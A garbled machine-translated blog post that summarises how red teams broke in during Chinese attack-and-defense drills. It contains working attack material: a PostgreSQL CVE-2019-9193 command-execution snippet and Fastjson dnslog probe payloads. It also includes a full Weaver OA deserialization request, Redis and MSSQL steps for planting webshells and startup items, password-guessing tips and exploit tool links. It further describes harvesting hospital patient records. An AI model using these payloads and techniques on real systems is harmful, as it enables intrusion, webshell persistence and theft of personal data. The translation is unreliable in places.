How to open the gap in attack and defense drill — Summary

Time:2022-5-14
How to open the gap in attack and defense drill -- Summary

Insert picture description here

preface

(it may be narrow-minded, there are deficiencies and mistakes, and the masters take it more often)

View information

Author: 0ne

The data of this article comes from the failure report of 18 + provincial and municipal level HVV and 90 + units. (one part is the author’s participation, and the other part is the report of other masters of the company) the idea is simple, not including fishing and blowing up the sky on 0day.

How to open the gap in attack and defense drill -- Summary

Insert picture description here

Statistical chart of breakthrough entry point methods:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

The scoring items in the attack and defense drill only focus on two points: permission & data: the type of permission is divided into system permission and application permission, and the level of permission is divided into administrator permission and ordinary user permission. Data is generally a four piece set, name, mobile phone number, ID card and address. Usually, sensitive data is defined in this way, but depending on the current application, the definition of sensitive information may be different. For example, in the hospital system, case information is even sensitive data.
According to the above statistical results, the method of selecting some scores from high to low is explained.

Weak password [web application]

Weak password is a loophole that can never be repaired. Every attack and defense drill will have a hole torn by weak password (29 times)

The weak passwords of some web applications are discussed here, excluding the weak passwords of PostgreSQL / redis / VPN / Jenkins / administrator in the statistical results.
Speaking of weak password, we have to mention the skills of blasting. Before blasting, try to bypass the verification code. Some verification codes are not refreshed or there are verification logic errors that can be bypassed. Usually, there may be a user name enumeration vulnerability where you forget your password. For the user name dictionary, it can be guessed as short name or job ID according to the current system. You can also browse the JS regular of the current login box or Google information search to make a reasonable guess. In the case of a large number of user bases, it is usually the best to traverse the user name with a fixed weak password. After obtaining the login background password MD5 decryption through SQL injection for many times, the probability that the administrator appears with the domain name abbreviation or the system abbreviation + @ year, or the password of the relevant abbreviation is not small. For example: a fire protection system / bjtuxfk [XXXX fire department], the backstage of a women’s Federation/ [email protected]

A handy dictionary
https://github.com/fuzz-security/SuperWordlist
https://github.com/gh0stkey/Web-Fuzzing-Box

Weak password [other]

The database weak password only meets PostgreSQL / redis. Other commonly used databases are often used. The rest may not even know that it is on for operation and maintenance.

PostgreSQL (versions 9.3 to 11.2) arbitrary command execution vulnerability (cve-2019-9193)

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Redis

Connect info to view server information [redis version and OS information]:
Redis 4.x/5.x RCE

https://github.com/Dliv3/redis-rogue-server
https://github.com/0671/RedisModules-ExecuteCommand-for-Windows

Linux
Write plan task, write public key, write webshell [know web path]
Windows
Write startup item, write webshell [know web path]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
https://github.com/r35tart/RedisWriteFile

To be honest, I haven’t encountered windows. I have enough permissions. Write the startup item first, and then try to restart it [YY hasn’t called QAQ]
These two windows & redis articles are quite detailed:

https://xz.aliyun.com/t/8153
https://xz.aliyun.com/t/7940

VPN weak password

If it is webvpn, the user base is large, and the weak password can be fixed and exploded according to the student ID and job ID. The VPN weak password in the case is a client that needs to be downloaded. The password is not like trying out, but more like leaking information from Google / git, or knowing the employee’s mobile phone number and throwing it into his pants, and putting it together according to the information inside [personal guess].

Jenkins weak password

The command line of the background script can execute commands. There is nothing to say about the download and execution of lolbas.

Admin weak password

There’s nothing to say about MySQL writing webshell.

Shiro deserialization

Shiro forever god! Without Shiro, I don’t know how to stand on the day (28 times)

Over the past two years, Shiro deserialization can be described as the first vulnerability utilization in the attack and defense drill. Whether it is the asset collection platform developed by the company or the excellent project shuize on git, it carries Shiro fingerprint identification. Shiro is also very simple to find the target. The target spreads from domain name to subdomain name to IP to full port. Import these URLs into Shiro identification tool. Run again and reuse. Among the 28 shiros counted, 27 were collected through oneforall or fofa, and one Shiro was found in the wechat official account.
Easy to use tools:

https://github.com/pmiaowu/BurpShiroPassiveScan
https://github.com/wyzxxz/shiro_rce_tool
https://github.com/j1anFen/shiro_attack

Any file upload [general]

Plain and unadorned (10 occurrences)

In general, the fastest way to get the shell is to find the upload. We should quickly verify whether the upload is based on the back-end white list verification. If the vulnerability is not resolved in the back-end or the combination of other vulnerabilities, we should abandon it in the verification list. It should be noted that when we judge the black-and-white list of uploaded files, the uploaded file content should be harmless, otherwise it may cause WAF interference. We must know whether the upload failure is due to the limitation of the program itself or the obstruction of WAF. Do not fuzz the upload interface. The thunder and rain are small.
It is worth mentioning that among the 10 uploads counted, once in the wechat applet, there was a swagger information disclosure upload interface, and once in the online chat system of a bank, when you click the manual time, the button of transmitting pictures will appear.

Customer service system:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

There is another case:
Enter the background, upload files through kindeditor, and manage files through XXXX. It has the function of renaming, which is changed to php。 getshell。
The essence of file upload around WAF is the difference between the server and WAF in packet analysis. Here are several abnormal packets:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

Fastjson deserialization

Easy to use (occurrence 6)

Judge whether it is fastjson: an error is reported, an exception is thrown, or dnslog

{"rand1":{"@type":"java.net.InetAddress","val":"gbi7ge.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}

Meet WAF:
Hex encoding or \ B:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

See:

https://www.sec-in.com/article/950
https://xz.aliyun.com/t/7568

Easy to use tools:

https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/wyzxxz/fastjson_rce_tool
https://github.com/feihong-cs/JNDIExploit

Disclosure of sensitive information

No matter how small a fly is, it is also meat (5 times)

Hospitals, the most common cases are wechat official account or small programs, which traverse case data:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

How to open the gap in attack and defense drill -- Summary

Insert picture description here

Swagger information disclosure construction interface query is also encountered:

How to open the gap in attack and defense drill -- Summary

Insert picture description here

How to open the gap in attack and defense drill -- Summary

Insert picture description here

UEditor1. 4.3 upload any file

Surprise (number of occurrences 5)

When you meet Net website, right-click to view the picture, and the URL is/ueditor/Upload / image / [20200101] this year / month format / 25 digits Png, we can judge that the site uses ueeditor [direct directory scanning tool is OK], so we need to splice the path ~ / net / controller ashx:
~The front may not be fixed. You need to find information in JS or make reasonable guesses.
Mention it, I met a site before png?. Aspx, the site returned 404, you can directly png. Aspx, and ueeditor has filtering? When WAF is available, it can be used as appropriate.

How to open the gap in attack and defense drill -- Summary

Insert picture description here

MSSQL Stack Injection

Basic operation

–After OS shell, you can get a command line, which is usually downloaded and executed by certutil or directly launched by PowerShell. You can also write to webshell:

Find static resource location physical path
for /r C:\ %i in (*xxx*) do @echo %i
dir /s/a-d/b C:\*xxx.xxx
Echo ^ < one sentence ^ > > C: \ phpstudy_ pro\WWW\shell. txt
< > be careful to use ^ escape
How to open the gap in attack and defense drill -- Summary

Insert picture description here

How to open the gap in attack and defense drill -- Summary

Insert picture description here

OA system

There’s nothing to say. There’s 0day smashing 0day

extensiveOA, toOA, communicationOA, withNC
GitHub search, internal accumulation, undisclosed utilization points are the best.
The two cases of Pan * OA use workflowservicexml deserialization, which is relatively smooth.
Determine whether it is available:

POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 523
Content-Type: text/xml;charest=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:doCreateWorkflowRequest>
        <web:string>
    <map>
    <entry>
            <url>http://m5alw5.dnslog.cn</url>
            <string>http://m5alw5.dnslog.cn</string>
            </entry>
            </map>
        </web:string>
        <web:string>2</web:string>
      </web:doCreateWorkflowRequest>
   </soapenv:Body>
</soapenv:Envelope>
How to open the gap in attack and defense drill -- Summary

Insert picture description here

mixed

talk nonsense

It doesn’t matter to get sensitive data by SQL injection. Remember to add the parameter random agent to sqlmap.
S2 sees less on the Internet, and I don’t know how the boss got in through the wall.
Historical backdoor 404 JSP has become an entry point is also outrageous.
All kinds of debug information are leaked. Import the cloud key into the cloud housekeeper and prove the permission.
Already incoherent

gossip

Picking up persimmons and kneading them soft

Web management is an efficiency job. It’s soft persimmon. Don’t give you a site. It took a long time to find out: eh, there’s an upload / Shiro / fastjson This will delay our efforts. We should be purposeful, try to reduce the process of trial and error and do less useless work.

last

Pay attention to me! Continuous update – private access【Network security learning materials · introduction